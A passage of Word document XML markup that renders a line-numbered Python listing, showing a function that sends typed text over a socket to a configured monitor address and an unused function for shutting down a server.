      <w:bookmarkEnd w:id="575"/>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76" w:name="l229"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">229  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="57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77" w:name="l230"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">230  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="577"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="578" w:name="l231"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">231  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="578"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="579" w:name="l232"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">232  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="579"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="580" w:name="l233"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">233  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="580"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># FUNCTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="581" w:name="l234"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">234  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="581"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="582" w:name="l235"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">235  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="582"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="583" w:name="l236"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">236  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="583"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Send data to monitor (realtime typing sending)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="584" w:name="l237"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">237  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="584"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>monitor_data_send</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>data_to_sen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85" w:name="l238"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">238  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="585"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>monitor_soc</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">,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586" w:name="l239"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">239  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="586"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Can send?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="587" w:name="l240"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">240  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="587"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_enable_send </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_ip </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">is not None and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_port </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>is not None:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="588" w:name="l241"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">241  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="588"/>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89" w:name="l242"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">242  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="589"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if not </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>monitor_soc</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">:     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Open connection to monitor if not connection exists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="590" w:name="l243"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">243  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="590"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_soc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91" w:name="l244"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">244  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="591"/>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ttimeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>MONITOR_SOCKET_TIMEOUT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="592" w:name="l245"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">245  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="592"/>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onnec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93" w:name="l246"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">246  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="59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d new Socket'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="594" w:name="l247"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">247  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="594"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="595" w:name="l248"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">248  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="595"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">data_to_send </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>data_to_send</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ENCODING</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">)        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Send Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="596" w:name="l249"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">249  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="596"/>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ndall</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7" w:name="l250"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">250  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="59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ed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8" w:name="l251"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">251  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="598"/>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599" w:name="l252"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">252  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="59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ending data to Monitor to {}:{}. Exception : {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="600" w:name="l253"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">253  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="600"/>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601" w:name="l254"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">254  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="60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02" w:name="l255"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">255  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="602"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>monitor_soc</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">:     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Close connection if not enabled Send</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="603" w:name="l256"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">256  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="60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04" w:name="l257"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">257  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="604"/>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05" w:name="l258"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">258  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="605"/>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606" w:name="l259"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">259  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="606"/>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607" w:name="l260"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">260  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="607"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="608" w:name="l261"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">261  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="608"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="609" w:name="l262"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">262  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="609"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Kill Server and associated clients : This function is maintained, but not used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="610" w:name="l263"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">263  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="610"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>kill_server_client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11" w:name="l264"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">264  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="611"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="612" w:name="l265"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">265  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="612"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="613" w:name="l266"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">266  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="613"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>is not None:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
